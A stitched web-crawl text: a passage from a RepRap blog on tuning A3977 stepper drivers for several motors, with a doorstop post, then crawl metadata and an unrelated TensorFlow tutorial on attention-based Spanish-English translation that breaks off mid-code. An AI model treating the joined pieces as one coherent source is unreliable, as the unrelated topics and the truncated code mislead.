they beat with each other. The values give a minimum frequency of ~17kHz @ 0.3A and a maximum of ~150kHz on the lowest microstep value. 17kHz is not audible to me, but younger people might be able to hear it. There is still some audible noise at the point in the cycle when both coils have similar currents and so similar high frequencies. The beat frequency, which is the difference of the two, is then in the audio range. It isn't anywhere near as loud as when the chopping is in the audio range though. I can't see any spec for the maximum switching frequency although a couple of parameters are given at less than 50kHz. I suspect 150kHz is a bit on the high side, which would increase switching losses, but with such a low current compared to the rating of the chip I don't think it is a problem. One problem I had initially was that the switching waveform was unstable. It had cycles with a shorter on-time than required, which let the current fall until it then did a long cycle to catch up. The long cycle gave a low frequency that was back in the audio range. I think it was a consequence of the motor needing a very short off-time in order to be able to have the duty cycle nearly 100%. The current hardly falls during the off period, so a little noise due to ringing can trigger it to turn off too early. It is not helped by using the minimum blank time. I fixed it by putting 1uF capacitors across the sense resistors. 
The PFD value is best set to 100% fast decay with this motor. It works better with a 24V supply. The full 0.4A current can be achieved (but it gets much hotter of course) and it maintains microstepping accuracy at higher step rates than it does on 12V. ## MakerBot Lin SKU4118S-62-07 NEMA17 This is the NEMA17 that MakerBot used to supply. It is at the opposite extreme compared to the one above, i.e. it is a very low voltage motor, only 2V @ 2.5A. As mentioned before, this causes a couple of issues: - 1. The inductance is so low that the ripple current is significant compared to the lowest current microstep, causing positional errors. OK at 2A, but gets worse with lower currents. 2. It is difficult to get 2.5A from the A3977 without it overheating. The PCB layout has to be very good. The datasheet recommends 2oz copper and four layers. 2A is no problem and that is the maximum with the 0.25Ω sense resistors fitted to the board. At 2A the motor runs at about 40°C, so just about OK for use with PLA. The chip gets a lot hotter, about 77°C measured on the ground pins. I used a value of 56K for RT and 2.1V on PFD. To some extent the optimum PFD value depends on how fast you want it to go. ## Motion Control FL42STH47-1684A-01 NEMA17 This is the recommended motor for the Mendel extruder, details here. After buying a couple of these a friend pointed out that Zapp Automation do the same motor with dual shafts for about half the price! This is a high torque motor so it is longer and heavier than the previous two NEMA17s. Electrically it is in the sweet spot for the A3977 with a 12V supply. The A3977 can easily provide the full current and the switching frequency doesn't have wild fluctuations or drop into the audio range. When microstepped at 1.7A it gets to about 43°C but the chip only gets to 56°C. I used 39K for RT and 0V on PFD, i.e. 100% fast decay. I have high hopes for this motor as a replacement for the one above that is in my extruder currently. It should give me almost twice the torque and has the correct sized shaft, i.e. 5mm. The Lin and Kysan motors both have imperial shaft sizes which caught me out as I drilled the worm gear for 5mm thinking NEMA17 specified that, but it must just be the frame dimensions. ## MakerBot Keling KL23H251-24-8B NEMA23 This is the motor I used on my Darwin. It has 8 wires so it can be connected in bipolar serial or parallel. Series has the advantage that the full torque can be achieved with 1.7A which is easily within the range of the A3977. Parallel has one quarter of the inductance so torque will fall off with speed four times slower. To get full torque 3.4A is needed but I found 1A was enough for the X and Y axes. I think Z needs more torque but my z-axis uses different motors so I don't know how much. An RT value of 56K is fine for currents in the range 1-2A. PFD is best at 0v, i.e. 100% fast decay. 
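Before the summary tables below, it may help to see how the Vref figures relate to the current figures. On the A3977 the peak trip current is set by Vref and the sense resistors, roughly as Itrip = Vref / (8 × Rs) per the Allegro datasheet, so with the 0.25Ω sense resistors mentioned above Vref is simply twice the current. A small helper (my own illustrative sketch, not code from any of the boards discussed here):

```python
def a3977_vref(i_peak, r_sense=0.25):
    """Vref needed for a given peak coil current on the A3977.

    The chip trips at I = Vref / (8 * Rs), so Vref = 8 * I * Rs.
    r_sense defaults to the 0.25 ohm sense resistors used on this board.
    """
    return 8.0 * i_peak * r_sense

# Reproduces the figures in the tables below, for example:
print(a3977_vref(1.0))   # 2.0 V for 1 A
print(a3977_vref(1.7))   # 3.4 V for 1.7 A (Motion Control motor)
print(a3977_vref(0.3))   # 0.6 V for 0.3 A (Kysan motor)
```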
## Summary

Here is a summary of the motor specifications: -

| Motor | Resistance | Max Current | Voltage | Max Power | Holding Torque | Inductance |
|---|---|---|---|---|---|---|
| LIN 4118S-62-07 | 0.8 Ohm | 2.5 A | 2.0 V | 10.0 W | 0.30 Nm | |
| Kysan SKU 1123029 | 35.0 Ohm | 0.4 A | 14.0 V | 11.2 W | 0.26 Nm | 44.0 mH |
| Motion Control FL42STH47-1684A-01 | 1.7 Ohm | 1.7 A | 2.8 V | 9.5 W | 0.43 Nm | 2.8 mH |
| Keling KL23H251-24-8B Series | 3.6 Ohm | 1.7 A | 6.1 V | 20.8 W | 1.10 Nm | 13.2 mH |
| Keling KL23H251-24-8B Parallel | 0.9 Ohm | 3.4 A | 3.1 V | 20.8 W | 1.10 Nm | 3.3 mH |

Here are my suggested settings: -

| Motor | Current | Vref | CT | RT | PFD |
|---|---|---|---|---|---|
| Kysan SKU 1123029 | 0.25 – 0.3A | 0.5 – 0.6V | 470pF | 12K | 0 |
| LIN 4118S-62-07 | 1 – 2A | 2 – 4V | 470pF | 56K | 2.1V |
| Motion Control FL42STH47-1684A-01 | 1 – 1.7A | 2 – 3.4V | 470pF | 39K | 0 |
| Keling KL23H251-24-8B Parallel | 1 – 2A | 2 – 4V | 470pF | 56K | 0 |

## Friday, 4 December 2009

### Quality control

I RepRapped a doorstop for our new bathroom shower: -

It has a 10mm hole most of the way down and a countersink to take a ~5mm wood screw. A 2mm self adhesive felt pad covers the screw hole and acts as a shock absorber. It has a rim around the bottom to prevent it rocking if the base warps or the wall is not flat. To support the bottom of the hole there is a one layer membrane: -

I removed it with a 5mm drill: -

I was quite proud of it but my wife had something more like this in mind: -

I can't print chrome yet, so I will have to go out and buy one, and it has three screws which have to be drilled through the tiles into the wall. The files are on Thingiverse if you prefer function over form.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4322795867919922, "perplexity": 2742.9218487494745}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084893397.98/warc/CC-MAIN-20180124050449-20180124070449-00166.warc.gz"}
https://www.tensorflow.org/text/tutorials/nmt_with_attention?hl=nb-NO
# Neural machine translation with attention

This notebook trains a sequence to sequence (seq2seq) model for Spanish to English translation based on Effective Approaches to Attention-based Neural Machine Translation. This is an advanced example that assumes some background knowledge. While this architecture is somewhat outdated it is still a very useful project to work through to get a deeper understanding of attention mechanisms (before going on to Transformers).

After training the model in this notebook, you will be able to input a Spanish sentence, such as "¿todavia estan en casa?", and return the English translation: "are you still at home?"

The resulting model is exportable as a tf.saved_model, so it can be used in other TensorFlow environments. The translation quality is reasonable for a toy example, but the generated attention plot is perhaps more interesting. This shows which parts of the input sentence have the model's attention while translating.

## Setup

pip install tensorflow_text

import numpy as np

import typing
from typing import Any, Tuple

import tensorflow as tf
from tensorflow.keras.layers.experimental import preprocessing

import tensorflow_text as tf_text

import matplotlib.pyplot as plt
import matplotlib.ticker as ticker

This tutorial builds a few layers from scratch; use this variable if you want to switch between the custom and built-in implementations.

use_builtins = True

This tutorial uses a lot of low level APIs where it's easy to get shapes wrong. This class is used to check shapes throughout the tutorial.

## The data

We'll use a language dataset provided by http://www.manythings.org/anki/ This dataset contains language translation pairs in the format:

May I borrow this book? ¿Puedo tomar prestado este libro?

They have a variety of languages available, but we'll use the English-Spanish dataset.

1. Add a start and end token to each sentence.
2. Clean the sentences by removing special characters.
3. Create a word index and reverse word index (dictionaries mapping from word → id and id → word).
4. Pad each sentence to a maximum length.

# Download the file
import pathlib

path_to_zip = tf.keras.utils.get_file(
    'spa-eng.zip',
    origin='http://storage.googleapis.com/download.tensorflow.org/data/spa-eng.zip',
    extract=True)

path_to_file = pathlib.Path(path_to_zip).parent/'spa-eng/spa.txt'

Downloading data from http://storage.googleapis.com/download.tensorflow.org/data/spa-eng.zip
2646016/2638744 [==============================] - 0s 0us/step
2654208/2638744 [==============================] - 0s 0us/step

def load_data(path):
    text = path.read_text(encoding='utf-8')
    lines = text.splitlines()
    pairs = [line.split('\t') for line in lines]
    inp = [inp for targ, inp in pairs]
    targ = [targ for targ, inp in pairs]
    return targ, inp

targ, inp = load_data(path_to_file)
print(inp[-1])

Si quieres sonar como un hablante nativo, debes estar dispuesto a practicar diciendo la misma frase una y otra vez de la misma manera en que un músico de banjo practica el mismo fraseo una y otra vez hasta que lo puedan tocar correctamente y en el tiempo esperado.

print(targ[-1])

If you want to sound like a native speaker, you must be willing to practice saying the same sentence over and over in the same way that banjo players practice the same phrase over and over until they can play it correctly and at the desired tempo.
### Create a tf.data dataset From these arrays of strings you can create a tf.data.Dataset of strings that shuffles and batches them efficiently: BUFFER_SIZE = len(inp) BATCH_SIZE = 64 dataset = tf.data.Dataset.from_tensor_slices((inp, targ)).shuffle(BUFFER_SIZE) dataset = dataset.batch(BATCH_SIZE) for example_input_batch, example_target_batch in dataset.take(1): print(example_input_batch[:5]) print() print(example_target_batch[:5]) break tf.Tensor( [b'La temperatura descendi\xc3\xb3 a cinco grados bajo cero.' b'Tom dijo que \xc3\xa9l nunca dejar\xc3\xada a su esposa.' b'\xc2\xbfEsto es legal?' b'Tom se cay\xc3\xb3.' b'Se est\xc3\xa1 haciendo tarde, as\xc3\xad que es mejor que nos vayamos.'], shape=(5,), dtype=string) tf.Tensor( [b'The temperature fell to five degrees below zero.' b"Tom said he'd never leave his wife." b'Is this legal?' b'Tom fell down.' b"It's getting late, so we'd better get going."], shape=(5,), dtype=string) ### Text preprocessing One of the goals of this tutorial is to build a model that can be exported as a tf.saved_model. To make that exported model useful it should take tf.string inputs, and return tf.string outputs: All the text processing happens inside the model. #### Standardization The model is dealing with multilingual text with a limited vocabulary. So it will be important to standardize the input text. The first step is Unicode normalization to split accented characters and replace compatibility characters with their ASCII equivalents. The tensorflow_text package contains a unicode normalize operation: example_text = tf.constant('¿Todavía está en casa?') print(example_text.numpy()) print(tf_text.normalize_utf8(example_text, 'NFKD').numpy()) b'\xc2\xbfTodav\xc3\xada est\xc3\xa1 en casa?' b'\xc2\xbfTodavi\xcc\x81a esta\xcc\x81 en casa?' Unicode normalization will be the first step in the text standardization function: def tf_lower_and_split_punct(text): # Split accented characters. text = tf_text.normalize_utf8(text, 'NFKD') text = tf.strings.lower(text) # Keep space, a to z, and select punctuation. text = tf.strings.regex_replace(text, '[^ a-z.?!,¿]', '') text = tf.strings.regex_replace(text, '[.?!,¿]', r' \0 ') # Strip whitespace. text = tf.strings.strip(text) text = tf.strings.join(['[START]', text, '[END]'], separator=' ') return text print(example_text.numpy().decode()) print(tf_lower_and_split_punct(example_text).numpy().decode()) ¿Todavía está en casa? [START] ¿ todavia esta en casa ? [END] #### Text Vectorization This standardization function will be wrapped up in a preprocessing.TextVectorization layer which will handle the vocabulary extraction and conversion of input text to sequences of tokens. max_vocab_size = 5000 input_text_processor = preprocessing.TextVectorization( standardize=tf_lower_and_split_punct, max_tokens=max_vocab_size) The TextVectorization layer and many other experimental.preprocessing layers have an adapt method. This method reads one epoch of the training data, and works a lot like Model.fit. This adapt method initializes the layer based on the data.
Here it determines the vocabulary: input_text_processor.adapt(inp) # Here are the first 10 words from the vocabulary: input_text_processor.get_vocabulary()[:10] ['', '[UNK]', '[START]', '[END]', '.', 'que', 'de', 'el', 'a', 'no'] That's the Spanish TextVectorization layer, now build and .adapt() the English one: output_text_processor = preprocessing.TextVectorization( standardize=tf_lower_and_split_punct, max_tokens=max_vocab_size) output_text_processor.adapt(targ) output_text_processor.get_vocabulary()[:10] ['', '[UNK]', '[START]', '[END]', '.', 'the', 'i', 'to', 'you', 'tom'] Now these layers can convert a batch of strings into a batch of token IDs: example_tokens = input_text_processor(example_input_batch) example_tokens[:3, :10] <tf.Tensor: shape=(3, 10), dtype=int64, numpy= array([[ 2, 11, 1593, 1, 8, 313, 2658, 353, 2800, 4], [ 2, 10, 92, 5, 7, 82, 2677, 8, 25, 437], [ 2, 13, 58, 15, 1, 12, 3, 0, 0, 0]])> The get_vocabulary method can be used to convert token IDs back to text: input_vocab = np.array(input_text_processor.get_vocabulary()) tokens = input_vocab[example_tokens[0].numpy()] ' '.join(tokens) '[START] la temperatura [UNK] a cinco grados bajo cero . [END] ' The returned token IDs are zero-padded. This can easily be turned into a mask: plt.subplot(1, 2, 1) plt.pcolormesh(example_tokens) plt.title('Token IDs') plt.subplot(1, 2, 2) plt.pcolormesh(example_tokens != 0) Text(0.5, 1.0, 'Mask') ## The encoder/decoder model The following diagram shows an overview of the model. At each time-step the decoder's output is combined with a weighted sum over the encoded input, to predict the next word. The diagram and formulas are from Luong's paper. Before getting into it define a few constants for the model: embedding_dim = 256 units = 1024 ### The encoder Start by building the encoder, the blue part of the diagram above. The encoder: 1. Takes a list of token IDs (from input_text_processor). 2. Looks up an embedding vector for each token (Using a layers.Embedding). 3. Processes the embeddings into a new sequence (Using a layers.GRU). 4. Returns: • The processed sequence. This will be passed to the attention head. • The internal state. This will be used to initialize the decoder. class Encoder(tf.keras.layers.Layer): def __init__(self, input_vocab_size, embedding_dim, enc_units): super(Encoder, self).__init__() self.enc_units = enc_units self.input_vocab_size = input_vocab_size # The embedding layer converts tokens to vectors self.embedding = tf.keras.layers.Embedding(self.input_vocab_size, embedding_dim) # The GRU RNN layer processes those vectors sequentially. self.gru = tf.keras.layers.GRU(self.enc_units, # Return the sequence and state return_sequences=True, return_state=True, recurrent_initializer='glorot_uniform') def call(self, tokens, state=None): shape_checker = ShapeChecker() shape_checker(tokens, ('batch', 's')) # 2. The embedding layer looks up the embedding for each token. vectors = self.embedding(tokens) shape_checker(vectors, ('batch', 's', 'embed_dim')) # 3. The GRU processes the embedding sequence. # output shape: (batch, s, enc_units) # state shape: (batch, enc_units) output, state = self.gru(vectors, initial_state=state) shape_checker(output, ('batch', 's', 'enc_units')) shape_checker(state, ('batch', 'enc_units')) # 4. Returns the new sequence and its state. return output, state Here is how it fits together so far: # Convert the input text to tokens. example_tokens = input_text_processor(example_input_batch) # Encode the input sequence.
encoder = Encoder(input_text_processor.vocabulary_size(), embedding_dim, units) example_enc_output, example_enc_state = encoder(example_tokens) print(f'Input batch, shape (batch): {example_input_batch.shape}') print(f'Input batch tokens, shape (batch, s): {example_tokens.shape}') print(f'Encoder output, shape (batch, s, units): {example_enc_output.shape}') print(f'Encoder state, shape (batch, units): {example_enc_state.shape}') Input batch, shape (batch): (64,) Input batch tokens, shape (batch, s): (64, 24) Encoder output, shape (batch, s, units): (64, 24, 1024) Encoder state, shape (batch, units): (64, 1024) The encoder returns its internal state so that its state can be used to initialize the decoder. It's also common for an RNN to return its state so that it can process a sequence over multiple calls. You'll see more of that building the decoder. The decoder uses attention to selectively focus on parts of the input sequence. The attention takes a sequence of vectors as input for each example and returns an "attention" vector for each example. This attention layer is similar to a layers.GlobalAveragePooling1D but the attention layer performs a weighted average. Let's look at how this works: Where: • $s$ is the encoder index. • $t$ is the decoder index. • $\alpha_{ts}$ is the attention weights. • $h_s$ is the sequence of encoder outputs being attended to (the attention "key" and "value" in transformer terminology). • $h_t$ is the decoder state attending to the sequence (the attention "query" in transformer terminology). • $c_t$ is the resulting context vector. • $a_t$ is the final output combining the "context" and "query". The equations: 1. Calculates the attention weights, $\alpha_{ts}$, as a softmax across the encoder's output sequence. 2. Calculates the context vector as the weighted sum of the encoder outputs. Last is the $score$ function. Its job is to calculate a scalar logit-score for each key-query pair. There are two common approaches: This tutorial uses Bahdanau's additive attention. TensorFlow includes implementations of both as layers.Attention and layers.AdditiveAttention. The class below handles the weight matrices in a pair of layers.Dense layers, and calls the builtin implementation. class BahdanauAttention(tf.keras.layers.Layer): def __init__(self, units): super().__init__() # For Eqn. (4), the Bahdanau attention self.W1 = tf.keras.layers.Dense(units, use_bias=False) self.W2 = tf.keras.layers.Dense(units, use_bias=False) self.attention = tf.keras.layers.AdditiveAttention() def call(self, query, value, mask): shape_checker = ShapeChecker() shape_checker(query, ('batch', 't', 'query_units')) shape_checker(value, ('batch', 's', 'value_units')) # From Eqn. (4), W1@ht. w1_query = self.W1(query) shape_checker(w1_query, ('batch', 't', 'attn_units')) # From Eqn. (4), W2@hs. w2_key = self.W2(value) shape_checker(w2_key, ('batch', 's', 'attn_units')) query_mask = tf.ones(tf.shape(query)[:-1], dtype=bool) value_mask = mask context_vector, attention_weights = self.attention( inputs = [w1_query, value, w2_key], mask = [query_mask, value_mask], return_attention_scores = True, ) shape_checker(context_vector, ('batch', 't', 'value_units')) shape_checker(attention_weights, ('batch', 't', 's')) return context_vector, attention_weights ### Test the Attention layer Create a BahdanauAttention layer: attention_layer = BahdanauAttention(units) This layer takes 3 inputs: • The query: This will be generated by the decoder, later. • The value: This will be the output of the encoder.
• The mask: To exclude the padding, example_tokens != 0 (example_tokens != 0).shape TensorShape([64, 24]) The vectorized implementation of the attention layer lets you pass a batch of sequences of query vectors and a batch of sequences of value vectors. The result is: 1. A batch of sequences of result vectors the size of the queries. 2. A batch attention maps, with size (query_length, value_length). # Later, the decoder will generate this attention query example_attention_query = tf.random.normal(shape=[len(example_tokens), 2, 10]) # Attend to the encoded tokens context_vector, attention_weights = attention_layer( query=example_attention_query, value=example_enc_output, mask=(example_tokens != 0)) print(f'Attention result shape: (batch_size, query_seq_length, units): {context_vector.shape}') print(f'Attention weights shape: (batch_size, query_seq_length, value_seq_length): {attention_weights.shape}') Attention result shape: (batch_size, query_seq_length, units): (64, 2, 1024) Attention weights shape: (batch_size, query_seq_length, value_seq_length): (64, 2, 24) The attention weights should sum to 1.0 for each sequence. Here are the attention weights across the sequences at t=0: plt.subplot(1, 2, 1) plt.pcolormesh(attention_weights[:, 0, :]) plt.title('Attention weights') plt.subplot(1, 2, 2) plt.pcolormesh(example_tokens != 0) Text(0.5, 1.0, 'Mask') Because of the small-random initialization the attention weights are all close to 1/(sequence_length). If you zoom in on the weights for a single sequence, you can see that there is some small variation that the model can learn to expand, and exploit. attention_weights.shape TensorShape([64, 2, 24]) attention_slice = attention_weights[0, 0].numpy() attention_slice = attention_slice[attention_slice != 0] plt.suptitle('Attention weights for one sequence') plt.figure(figsize=(12, 6)) a1 = plt.subplot(1, 2, 1) plt.bar(range(len(attention_slice)), attention_slice) # freeze the xlim plt.xlim(plt.xlim()) plt.xlabel('Attention weights') a2 = plt.subplot(1, 2, 2) plt.bar(range(len(attention_slice)), attention_slice) plt.xlabel('Attention weights, zoomed') # zoom in top = max(a1.get_ylim()) zoom = 0.85*top a2.set_ylim([0.90*top, top]) a1.plot(a1.get_xlim(), [zoom, zoom], color='k') [<matplotlib.lines.Line2D at 0x7fc2b9997a10>] <Figure size 432x288 with 0 Axes> ### The decoder The decoder's job is to generate predictions for the next output token. 1. The decoder receives the complete encoder output. 2. It uses an RNN to keep track of what it has generated so far. 3. It uses its RNN output as the query to the attention over the encoder's output, producing the context vector. 4. It combines the RNN output and the context vector using Equation 3 (below) to generate the "attention vector". 5. It generates logit predictions for the next token based on the "attention vector". Here is the Decoder class and its initializer. The initializer creates all the necessary layers. class Decoder(tf.keras.layers.Layer): def __init__(self, output_vocab_size, embedding_dim, dec_units): super(Decoder, self).__init__() self.dec_units = dec_units self.output_vocab_size = output_vocab_size self.embedding_dim = embedding_dim # For Step 1. The embedding layer converts token IDs to vectors self.embedding = tf.keras.layers.Embedding(self.output_vocab_size, embedding_dim) # For Step 2. The RNN keeps track of what's been generated so far. self.gru = tf.keras.layers.GRU(self.dec_units, return_sequences=True, return_state=True, recurrent_initializer='glorot_uniform') # For step 3.
The RNN output will be the query for the attention layer. self.attention = BahdanauAttention(self.dec_units) # For step 4. Eqn. (3): converting ct to at self.Wc = tf.keras.layers.Dense(dec_units, activation=tf.math.tanh, use_bias=False) # For step 5. This fully connected layer produces the logits for each # output token. self.fc = tf.keras.layers.Dense(self.output_vocab_size) The call method for this layer takes and returns multiple tensors. Organize those into simple container classes: class DecoderInput(typing.NamedTuple): new_tokens: Any enc_output: Any mask: Any class DecoderOutput(typing.NamedTuple): logits: Any attention_weights: Any Here is the implementation of the call method: def call(self, inputs: DecoderInput, state=None) -> Tuple[DecoderOutput, tf.Tensor]: shape_checker = ShapeChecker() shape_checker(inputs.new_tokens, ('batch', 't')) shape_checker(inputs.enc_output, ('batch', 's', 'enc_units')) if state is not None: shape_checker(state, ('batch', 'dec_units')) # Step 1. Lookup the embeddings vectors = self.embedding(inputs.new_tokens) shape_checker(vectors, ('batch', 't', 'embedding_dim')) # Step 2. Process one step with the RNN rnn_output, state = self.gru(vectors, initial_state=state) shape_checker(rnn_output, ('batch', 't', 'dec_units')) shape_checker(state, ('batch', 'dec_units')) # Step 3. Use the RNN output as the query for the attention over the # encoder output. context_vector, attention_weights = self.attention( query=rnn_output, value=inputs.enc_output, mask=inputs.mask) shape_checker(context_vector, ('batch', 't', 'dec_units')) shape_checker(attention_weights, ('batch', 't', 's')) # Step 4. Eqn. (3): Join the context_vector and rnn_output # [ct; ht] shape: (batch, t, value_units + query_units) context_and_rnn_output = tf.concat([context_vector, rnn_output], axis=-1) # Step 4. Eqn. (3): at = tanh(Wc@[ct; ht]) attention_vector = self.Wc(context_and_rnn_output) shape_checker(attention_vector, ('batch', 't', 'dec_units')) # Step 5. Generate logit predictions: logits = self.fc(attention_vector) shape_checker(logits, ('batch', 't', 'output_vocab_size')) return DecoderOutput(logits, attention_weights), state Decoder.call = call The encoder processes its full input sequence with a single call to its RNN. This implementation of the decoder can do that as well for efficient training. But this tutorial will run the decoder in a loop for a few reasons: • Flexibility: Writing the loop gives you direct control over the training procedure. • Clarity: It's possible to do masking tricks and use layers.RNN, or tfa.seq2seq APIs to pack this all into a single call. But writing it out as a loop may be clearer. Now try using this decoder. decoder = Decoder(output_text_processor.vocabulary_size(), embedding_dim, units) The decoder takes 4 inputs. • new_tokens - The last token generated. Initialize the decoder with the "[START]" token. • enc_output - Generated by the Encoder. • mask - A boolean tensor indicating where tokens != 0 • state - The previous state output from the decoder (the internal state of the decoder's RNN). Pass None to zero-initialize it. The original paper initializes it from the encoder's final RNN state.
# Convert the target sequence, and collect the "[START]" tokens example_output_tokens = output_text_processor(example_target_batch) start_index = output_text_processor.get_vocabulary().index('[START]') first_token = tf.constant([[start_index]] * example_output_tokens.shape[0]) # Run the decoder dec_result, dec_state = decoder( inputs = DecoderInput(new_tokens=first_token, enc_output=example_enc_output, mask=(example_tokens != 0)), state = example_enc_state ) print(f'logits shape: (batch_size, t, output_vocab_size) {dec_result.logits.shape}') print(f'state shape: (batch_size, dec_units) {dec_state.shape}') logits shape: (batch_size, t, output_vocab_size) (64, 1, 5000) state shape: (batch_size, dec_units) (64, 1024) Sample a token according to the logits: sampled_token = tf.random.categorical(dec_result.logits[:, 0, :], num_samples=1) Decode the token as the first word of the output: vocab = np.array(output_text_processor.get_vocabulary()) first_word = vocab[sampled_token.numpy()] first_word[:5] array([['childhood'], ['meditating'], ['this'], ['yell'], ['minister']], dtype='<U16') Now use the decoder to generate a second set of logits. • Pass the same enc_output and mask, these haven't changed. • Pass the sampled token as new_tokens. • Pass the decoder_state the decoder returned last time, so the RNN continues with a memory of where it left off last time. dec_result, dec_state = decoder( DecoderInput(sampled_token, example_enc_output, mask=(example_tokens != 0)), state=dec_state) sampled_token = tf.random.categorical(dec_result.logits[:, 0, :], num_samples=1) first_word = vocab[sampled_token.numpy()] first_word[:5] array([['passes'], ['runner'], ['worthless'], ['consideration'], ['appearances']], dtype='<U16') ## Training Now that you have all the model components, it's time to start training the model. You'll need: • A loss function and optimizer to perform the optimization. • A training step function defining how to update the model for each input/target batch. • A training loop to drive the training and save checkpoints. ### Define the loss function class MaskedLoss(tf.keras.losses.Loss): def __init__(self): self.loss = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def __call__(self, y_true, y_pred): shape_checker = ShapeChecker() shape_checker(y_true, ('batch', 't')) shape_checker(y_pred, ('batch', 't', 'logits')) # Calculate the loss for each item in the batch. loss = self.loss(y_true, y_pred) shape_checker(loss, ('batch', 't')) # Mask off the losses on padding. mask = tf.cast(y_true != 0, tf.float32) loss *= mask # Return the total. return tf.reduce_sum(loss) ### Implement the training step Start with a model class, the training process will be implemented as the train_step method on this model. See Customizing fit for details. Here the train_step method is a wrapper around the _train_step implementation which will come later. This wrapper includes a switch to turn on and off tf.function compilation, to make debugging easier.
class TrainTranslator(tf.keras.Model): def __init__(self, embedding_dim, units, input_text_processor, output_text_processor, use_tf_function=True): super().__init__() # Build the encoder and decoder encoder = Encoder(input_text_processor.vocabulary_size(), embedding_dim, units) decoder = Decoder(output_text_processor.vocabulary_size(), embedding_dim, units) self.encoder = encoder self.decoder = decoder self.input_text_processor = input_text_processor self.output_text_processor = output_text_processor self.use_tf_function = use_tf_function self.shape_checker = ShapeChecker() def train_step(self, inputs): self.shape_checker = ShapeChecker() if self.use_tf_function: return self._tf_train_step(inputs) else: return self._train_step(inputs) Overall the implementation for the Model.train_step method is as follows: 1. Receive a batch of input_text, target_text from the tf.data.Dataset. 2. Convert those raw text inputs to token-embeddings and masks. 3. Run the encoder on the input_tokens to get the encoder_output and encoder_state. 4. Initialize the decoder state and loss. 5. Loop over the target_tokens: 1. Run the decoder one step at a time. 2. Calculate the loss for each step. 3. Accumulate the average loss. 6. Calculate the gradient of the loss and use the optimizer to apply updates to the model's trainable_variables. The _preprocess method, added below, implements steps #1 and #2: def _preprocess(self, input_text, target_text): self.shape_checker(input_text, ('batch',)) self.shape_checker(target_text, ('batch',)) # Convert the text to token IDs input_tokens = self.input_text_processor(input_text) target_tokens = self.output_text_processor(target_text) self.shape_checker(input_tokens, ('batch', 's')) self.shape_checker(target_tokens, ('batch', 't')) # Convert the token IDs to masks. input_mask = input_tokens != 0 target_mask = target_tokens != 0 return input_tokens, input_mask, target_tokens, target_mask TrainTranslator._preprocess = _preprocess The _train_step method, added below, handles the remaining steps except for actually running the decoder: def _train_step(self, inputs): input_text, target_text = inputs (input_tokens, input_mask, target_tokens, target_mask) = self._preprocess(input_text, target_text) max_target_length = tf.shape(target_tokens)[1] with tf.GradientTape() as tape: # Encode the input enc_output, enc_state = self.encoder(input_tokens) self.shape_checker(enc_output, ('batch', 's', 'enc_units')) self.shape_checker(enc_state, ('batch', 'enc_units')) # Initialize the decoder's state to the encoder's final state. # This only works if the encoder and decoder have the same number of # units. dec_state = enc_state loss = tf.constant(0.0) for t in tf.range(max_target_length-1): # Pass in two tokens from the target sequence: # 1. The current input to the decoder. # 2. The target for the decoder's next prediction. new_tokens = target_tokens[:, t:t+2] step_loss, dec_state = self._loop_step(new_tokens, input_mask, enc_output, dec_state) loss = loss + step_loss # Average the loss over all non padding tokens. average_loss = loss / tf.reduce_sum(tf.cast(target_mask, tf.float32)) # Apply an optimization step variables = self.trainable_variables gradients = tape.gradient(average_loss, variables) self.optimizer.apply_gradients(zip(gradients, variables)) # Return a dict mapping metric names to current value return {'batch_loss': average_loss} TrainTranslator._train_step = _train_step The _loop_step method, added below, executes the decoder and calculates the incremental loss and new decoder state (dec_state). def _loop_step(self, new_tokens, input_mask, enc_output, dec_state): input_token, target_token = new_tokens[:, 0:1], new_tokens[:, 1:2] # Run the decoder one step.
decoder_input = DecoderInput(new_tokens=input_token, enc_output=enc_output, mask=input_mask) dec_result, dec_state = self.decoder(decoder_input, state=dec_state) self.shape_checker(dec_result.logits, ('batch', 't1', 'logits')) self.shape_checker(dec_result.attention_weights, ('batch', 't1', 's')) self.shape_checker(dec_state, ('batch', 'dec_units')) # self.loss returns the total for non-padded tokens y = target_token y_pred = dec_result.logits step_loss = self.loss(y, y_pred) return step_loss, dec_state TrainTranslator._loop_step = _loop_step ### Test the training step Build a TrainTranslator, and configure it for training using the Model.compile method: translator = TrainTranslator( embedding_dim, units, input_text_processor=input_text_processor, output_text_processor=output_text_processor, use_tf_function=False) # Configure the loss and optimizer translator.compile( optimizer=tf.optimizers.Adam(), loss=MaskedLoss(), ) Test out the train_step. For a text model like this the loss should start near: np.log(output_text_processor.vocabulary_size()) 8.517193191416238 %%time for n in range(10): print(translator.train_step([example_input_batch, example_target_batch])) print() {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=7.614782>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=7.5835567>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=7.5252647>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=7.361221>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=6.7776713>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=5.271942>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=4.822084>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=4.702935>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=4.303531>} {'batch_loss': <tf.Tensor: shape=(), dtype=float32, numpy=4.150844>} CPU times: user 5.21 s, sys: 0 ns, total: 5.21 s Wall time: 5.17 s While it's easier to debug without a tf.function, wrapping the training step in one does give a performance boost. So now that the _train_step method is working, try the tf.function-wrapped _tf_train_step, to maximize performance while training: @tf.function(input_signature=[[tf.TensorSpec(dtype=tf.string, shape=[None]), tf.TensorSpec(dtype=tf.string, shape=[None])]]) def _tf_train_step(self, 